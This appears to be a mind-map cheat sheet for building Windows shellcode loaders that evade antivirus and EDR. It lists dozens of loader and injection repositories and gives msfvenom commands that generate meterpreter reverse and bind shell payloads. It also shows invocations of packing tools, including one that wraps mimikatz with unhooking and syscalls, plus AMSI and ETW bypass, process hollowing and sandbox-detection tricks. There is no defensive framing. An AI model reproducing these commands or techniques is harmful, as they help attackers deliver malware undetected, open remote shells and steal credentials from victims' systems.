markmap | ||||
---|---|---|---|---|
|
- allocating memory
- moving shellcode into that memory
- executing the shellcode
-
#include <iostream> #include <Windows.h> int main(void) { HMODULE hMod = LoadLibrary("shellcode.dll"); if (hMod == nullptr) { cout << "Failed to load shellcode.dll" << endl; } return 0; }
- https://medium.com/securebit/bypassing-av-through-metasploit-loader-64-bit-9abe55e3e0c8
- https://github.com/ReversingID/Shellcode-Loader/tree/master/windows
- https://github.com/TheD1rkMtr/D1rkLrd
- https://github.com/NtDallas/Ulfberht
- https://github.com/vic4key/QLoader
- https://github.com/xuanxuan0/DripLoader
- https://github.com/Hagrid29/PELoader
- https://github.com/icyguider/Shhhloader
- https://github.com/TheD1rkMtr/Shellcode-Hide
- https://github.com/ProcessusT/Dictofuscation
- https://github.com/matro7sh/Selha/blob/main/C/aes-loader-stageless.c
- https://github.com/cribdragg3r/Alaris
- https://github.com/trustedsec/COFFLoader
- https://github.com/stephenfewer/ReflectiveDLLInjection
- https://github.com/Cracked5pider/KaynLdr
- https://github.com/mgeeky/ElusiveMice
- https://github.com/boku7/BokuLoader
- https://github.com/aeverj/NimShellCodeLoader
- https://github.com/sh3d0ww01f/nim_shellloader
- https://github.com/S3cur3Th1sSh1t/Nim-RunPE
- https://github.com/xl00t/yetAnotherNimCrypt
- https://github.com/matro7sh/myph
- https://github.com/matro7sh/221b
- https://github.com/EddieIvan01/gld
- https://github.com/zha0gongz1/DesertFox
- https://github.com/Ne0nd0g/go-shellcode
- https://github.com/f1zm0/hades
- https://github.com/D3Ext/Hooka
- https://github.com/b1tg/rs_shellcode
- https://github.com/r4ime/shellcode_loader
- https://github.com/cr7pt0pl4gu3/Pestilence
- https://github.com/memN0ps/srdi-rs
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<SERVER> LPORT=<PORT> -f raw
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 --encrypt rc4 --encrypt-key thisisakey -f dll
msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai '\x00' -i 30 RHOST=10.0.0.68 LPORT=9050 -f c | tr -d '"' | tr -d '\n' | more
wine hyperion.exe /root/payloads/shellter/shellter_putty_reverse_x86.exe
- Packing
- Polymorph
- Signature hiding
- CFG
- Change logo/icon
- Change date of compilation
- Bypass AMSI
- Description
- Add signature
- Network
- C2 by DNS
- P2P (hide ip from C2)
- HTTPS
- Direct syscalls
- Delayed execution
- WaitForSingleObjectEx
- Foliage
- Ekko
- A small sleep obfuscation technique that uses CreateTimerQueueTimer Win32 API
- Deathsleep
- Disable ETW
- DInvoke
- Packing
- AMSI Bypass
- Signature hiding
- https://github.com/optiv/ScareCrow
ScareCrow -I /Path/To/ShellCode -d facebook.com
- https://github.com/paranoidninja/CarbonCopy
- https://github.com/optiv/ScareCrow
- LOLBIN
- Entropy
- Disable ETW
- Indirect syscall
- https://github.com/optiv/Freeze
Freeze -I /PathToShellcode -encrypt -sandbox -o packed.exe
- https://github.com/phra/PEzor
PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=120 mimikatz/x64/mimikatz.exe -z 2
- https://github.com/optiv/ScareCrow
- https://github.com/klezVirus/SysWhispers3
- https://github.com/jthuraisamy/SysWhispers2
- https://github.com/optiv/Freeze
- Disable AV
- Block DLL
- https://github.com/CCob/SharpBlock
- Detect virtual machines
- https://github.com/a0rtega/pafish
- with suspended
- https://damonmohammadbagher.medium.com/bypassing-anti-virus-by-creating-remote-thread-into-target-process-45f145b2ac7a
- https://subscription.packtpub.com/book/security/9781789610789/8/ch08lvl1sec50/executing-the-inject-code-using-apc-queuing
- https://github.com/LloydLabs/ntqueueapcthreadex-ntdll-gadget-injection
- https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/
- https://www.ired.team/offensive-security/code-injection-process-injection/process-hollowing-and-pe-image-relocations#relocation
- https://sevrosecurity.com/2020/04/08/process-injection-part-1-createremotethread/
- https://0xsp.com/security%20research%20%20development%20srd/defeat-the-castle-bypass-av-advanced-xdr-solutions/
- https://github.com/0xsp-SRD/mortar
- https://www.blackhat.com/docs/asia-17/materials/asia-17-KA-What-Malware-Authors-Don't-Want-You-To-Know-Evasive-Hollow-Process-Injection-wp.pdf
- Reflective dll injection
- https://github.com/fancycode/MemoryModule
- https://github.com/TheD1rkMtr/NTDLLReflection
- https://github.com/reveng007/ReflectiveNtdll
https://www.ired.team/offensive-security/code-injection-process-injection/dll-injection
- DLL Sideloading & Proxying
- You put your region in RW, you write your shellcode, then you reprotect in RX, then you run the thread. This way your region is never in rwx
- https://www.mdsec.co.uk/2022/04/process-injection-via-component-object-model-com-irundowndocallback/
- https://0xpat.github.io/Abusing_COM_Objects/
- Count processus number
- if >=40 its probably not a VM
- User interaction
- Send MessageBoxW
- Check for internet
- Datetime on compilation
- Check for Computer name
- VM = DESKTOP-[0-9A-Z]{7}
- CPUID timing
- Typical user workstation has a processor with at least 2 cores, a minimum of 2 GB of RAM and a 100 GB hard drive
- https://github.com/S4ntiagoP/donut/tree/syscalls
- https://github.com/hasherezade/pe_to_shellcode
- https://github.com/monoxgas/sRDI
From .exe (build with .net) to .exe hidden
- dotnet (object file)
- BoF (Beacon object file)